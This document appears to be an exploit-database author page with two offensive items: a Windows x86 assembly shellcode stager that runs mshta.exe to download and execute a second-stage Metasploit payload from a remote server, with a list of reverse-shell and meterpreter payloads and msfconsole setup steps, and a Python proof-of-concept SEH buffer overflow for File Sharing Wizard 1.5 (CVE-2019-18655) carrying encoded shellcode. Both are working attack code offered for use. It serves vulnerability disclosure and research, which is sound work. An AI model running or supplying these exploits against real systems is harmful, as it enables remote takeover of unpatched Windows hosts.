Shellcode - Windows/x86 - Stager Generic MSHTA (143 bytes)

 

Author: Armando Huesca Prida

Summary: 

Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit hta_server exploit. This shellcode uses JMPCALLPOP technique and static kernel32.dll function addresses.

Exploitdb publication: shellcode

Shellcode informations:

# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
# Exploit Author: Armando Huesca Prida
# Date: 11-01-2021
# Tested on:  Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
#        Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
#                    Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)

Metasploit compatible payload list:

# generic/custom
# generic/debug_trap
# generic/shell_bind_tcp
# generic/shell_reverse_tcp
# generic/tight_loop
# windows/dllinject/bind_hidden_ipknock_tcp
# windows/dllinject/bind_hidden_tcp
# windows/dllinject/bind_ipv6_tcp
# windows/dllinject/bind_ipv6_tcp_uuid
# windows/dllinject/bind_named_pipe
# windows/dllinject/bind_nonx_tcp
# windows/dllinject/bind_tcp
# windows/dllinject/bind_tcp_rc4
# windows/dllinject/bind_tcp_uuid
# windows/dllinject/reverse_hop_http
# windows/dllinject/reverse_http
# windows/dllinject/reverse_http_proxy_pstore
# windows/dllinject/reverse_ipv6_tcp
# windows/dllinject/reverse_nonx_tcp
# windows/dllinject/reverse_ord_tcp
# windows/dllinject/reverse_tcp
# windows/dllinject/reverse_tcp_allports
# windows/dllinject/reverse_tcp_dns
# windows/dllinject/reverse_tcp_rc4
# windows/dllinject/reverse_tcp_rc4_dns
# windows/dllinject/reverse_tcp_uuid
# windows/dllinject/reverse_winhttp
# windows/dns_txt_query_exec
# windows/download_exec
# windows/exec
# windows/loadlibrary
# windows/messagebox
# windows/meterpreter/bind_hidden_ipknock_tcp
# windows/meterpreter/bind_hidden_tcp
# windows/meterpreter/bind_ipv6_tcp
# windows/meterpreter/bind_ipv6_tcp_uuid
# windows/meterpreter/bind_named_pipe
# windows/meterpreter/bind_nonx_tcp
# windows/meterpreter/bind_tcp
# windows/meterpreter/bind_tcp_rc4
# windows/meterpreter/bind_tcp_uuid
# windows/meterpreter/reverse_hop_http
# windows/meterpreter/reverse_http
# windows/meterpreter/reverse_http_proxy_pstore
# windows/meterpreter/reverse_https
# windows/meterpreter/reverse_https_proxy
# windows/meterpreter/reverse_ipv6_tcp
# windows/meterpreter/reverse_named_pipe
# windows/meterpreter/reverse_nonx_tcp
# windows/meterpreter/reverse_ord_tcp
# windows/meterpreter/reverse_tcp
# windows/meterpreter/reverse_tcp_allports
# windows/meterpreter/reverse_tcp_dns
# windows/meterpreter/reverse_tcp_rc4
# windows/meterpreter/reverse_tcp_rc4_dns
# windows/meterpreter/reverse_tcp_uuid
# windows/meterpreter/reverse_winhttp
# windows/meterpreter/reverse_winhttps
# windows/metsvc_bind_tcp
# windows/metsvc_reverse_tcp
# windows/patchupdllinject/bind_hidden_ipknock_tcp
# windows/patchupdllinject/bind_hidden_tcp
# windows/patchupdllinject/bind_ipv6_tcp
# windows/patchupdllinject/bind_ipv6_tcp_uuid
# windows/patchupdllinject/bind_named_pipe
# windows/patchupdllinject/bind_nonx_tcp
# windows/patchupdllinject/bind_tcp
# windows/patchupdllinject/bind_tcp_rc4
# windows/patchupdllinject/bind_tcp_uuid
# windows/patchupdllinject/reverse_ipv6_tcp
# windows/patchupdllinject/reverse_nonx_tcp
# windows/patchupdllinject/reverse_ord_tcp
# windows/patchupdllinject/reverse_tcp
# windows/patchupdllinject/reverse_tcp_allports
# windows/patchupdllinject/reverse_tcp_dns
# windows/patchupdllinject/reverse_tcp_rc4
# windows/patchupdllinject/reverse_tcp_rc4_dns
# windows/patchupdllinject/reverse_tcp_uuid
# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
# windows/patchupmeterpreter/bind_hidden_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp
# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
# windows/patchupmeterpreter/bind_named_pipe
# windows/patchupmeterpreter/bind_nonx_tcp
# windows/patchupmeterpreter/bind_tcp
# windows/patchupmeterpreter/bind_tcp_rc4
# windows/patchupmeterpreter/bind_tcp_uuid
# windows/patchupmeterpreter/reverse_ipv6_tcp
# windows/patchupmeterpreter/reverse_nonx_tcp
# windows/patchupmeterpreter/reverse_ord_tcp
# windows/patchupmeterpreter/reverse_tcp
# windows/patchupmeterpreter/reverse_tcp_allports

 "hta_server" exploit payloads setting example:

# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)

# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)

# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)

# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)

# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)

Shellcode considerations:

# Function address of CreateProcessA in kernel32.dll: 0x75732082
# Function address of ExitProcess in kernel32.dll: 0x7578214f
# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit

Assembly shellcode:

global _start
section .text
_start:
jmp application
firststep:
pop edi
xor eax, eax
mov [edi+65], al ; size in bytes of message db parameter
StartUpInfoANDProcessInformation:
push eax ; hStderror null in this case
push eax ; hStdOutput, null
push eax ; hStdInput, null
xor ebx, ebx
xor ecx, ecx
add cl, 0x12 ; 18 times loop to fill both structures.
looper:
push ebx
loop looper
;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
mov bx, 0x1111
sub bx, 0x1010
mov word [esp+0x3c], bx
mov byte [esp+0x10], 0x44 ; cb=0x44
lea eax, [esp+0x10] ; eax points to StartUpInfo
; eax has a pointer to StartUPinfo
; esp has a pointer to Process_Info containing null values
createprocessA:
push esp ; pointer to Process-Info
push eax ; pointer to StartUpInfo
xor ebx, ebx
push ebx ; null
push ebx ; null
push ebx ; null
inc ebx
push ebx ; bInheritHandles=true
dec ebx
push ebx ; null
push ebx ; null
push edi ; pointer to message db string
push ebx ; null
mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
call edx
ExitProcess:
push eax ; createprocessA return in eax
mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
call edx
application:
call firststep
message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"

CVE-2019-18655: FILE SHARING WIZARD VERSION 1.5 - GET STRUCTURED EXCEPTION HANDLER BASED BUFFER OVERFLOW

Author: Armando Huesca Prida

Summary: 

File Sharing Wizard version 1.5.0 is affected of Structured Exception Handler based buffer overflow vulnerability. An unauthenticated attacker is able to perform remote command execution and obtain a command shell by sending a HTTP GET request including the malicious payload in the URL, a similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331. 

Software Version: File Sharing Wizard version 1.5.0 build 2008 

Tested OS Versions: 
Microsoft Windows Vista Ultimate 6.0.6002 Service Pack 2 Build 6002 
Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 Build 7601 

Product URL: https://file-sharing-wizard.soft112.com/ 

CVE-ID: CVE-2019-18655 

Details: 

File Sharing Wizard version 1.5.0 build 2008 is affected of Structured Exception Handler based buffer overflow vulnerability. An attacker is able to perform remote command execution and obtain a command shell by sending a HTTP GET request including the malicious payload in the URL, a similar issue to CVE-2019-17415, CVE-2019-16724, and CVE-2010-2331. 

Following a Proof of Concept exploit (PoC) in order to exploit this vulnerability.  

################### PoC ################### 
#!/usr/bin/python 
import socket 
import os 
import sys 

# Bad chars: \x00\x20 # 
# SEH value: 0x9090eb08 (JMP short) # 
# NSEH value: 0x7c37576d : pop esi # pop edi # ret | asciiprint,ascii {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)  

seh='\x6d\x57\x37\x7c' 
nseh='\x90\x90\xeb\x08' 

buf = b"" 
buf += b"\xbe\x8f\x59\xb8\x41\xdb\xd5\xd9\x74\x24\xf4\x5a\x31" 
buf += b"\xc9\xb1\x31\x31\x72\x13\x83\xea\xfc\x03\x72\x80\xbb" 
buf += b"\x4d\xbd\x76\xb9\xae\x3e\x86\xde\x27\xdb\xb7\xde\x5c" 
buf += b"\xaf\xe7\xee\x17\xfd\x0b\x84\x7a\x16\x98\xe8\x52\x19" 
buf += b"\x29\x46\x85\x14\xaa\xfb\xf5\x37\x28\x06\x2a\x98\x11" 
buf += b"\xc9\x3f\xd9\x56\x34\xcd\x8b\x0f\x32\x60\x3c\x24\x0e" 
buf += b"\xb9\xb7\x76\x9e\xb9\x24\xce\xa1\xe8\xfa\x45\xf8\x2a" 
buf += b"\xfc\x8a\x70\x63\xe6\xcf\xbd\x3d\x9d\x3b\x49\xbc\x77" 
buf += b"\x72\xb2\x13\xb6\xbb\x41\x6d\xfe\x7b\xba\x18\xf6\x78" 
buf += b"\x47\x1b\xcd\x03\x93\xae\xd6\xa3\x50\x08\x33\x52\xb4" 
buf += b"\xcf\xb0\x58\x71\x9b\x9f\x7c\x84\x48\x94\x78\x0d\x6f" 
buf += b"\x7b\x09\x55\x54\x5f\x52\x0d\xf5\xc6\x3e\xe0\x0a\x18" 
buf += b"\xe1\x5d\xaf\x52\x0f\x89\xc2\x38\x45\x4c\x50\x47\x2b" 
buf += b"\x4e\x6a\x48\x1b\x27\x5b\xc3\xf4\x30\x64\x06\xb1\xcf" 
buf += b"\x2e\x0b\x93\x47\xf7\xd9\xa6\x05\x08\x34\xe4\x33\x8b" 
buf += b"\xbd\x94\xc7\x93\xb7\x91\x8c\x13\x2b\xeb\x9d\xf1\x4b" 
buf += b"\x58\x9d\xd3\x2f\x3f\x0d\xbf\x81\xda\xb5\x5a\xde" 

poc= 'A' * 1035 + nseh + seh + '\x90' * 10 + buf + '\x90' * (3949-len(buf)) 
payload='GET //.:/' + poc + ' HTTP/1.0\r\n\r\n' 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect(("172.16.216.135", 80)) 
s.send(payload) 
s.close 

Exploit Note: 

This PoC version was customized with a specific IP address, in order to use it in a different local network a new IP address should be defined. 

Metasploit's Module:  filesharing_wizard_get_bof.rb 

Credit: 

Discovered by Armando Huesca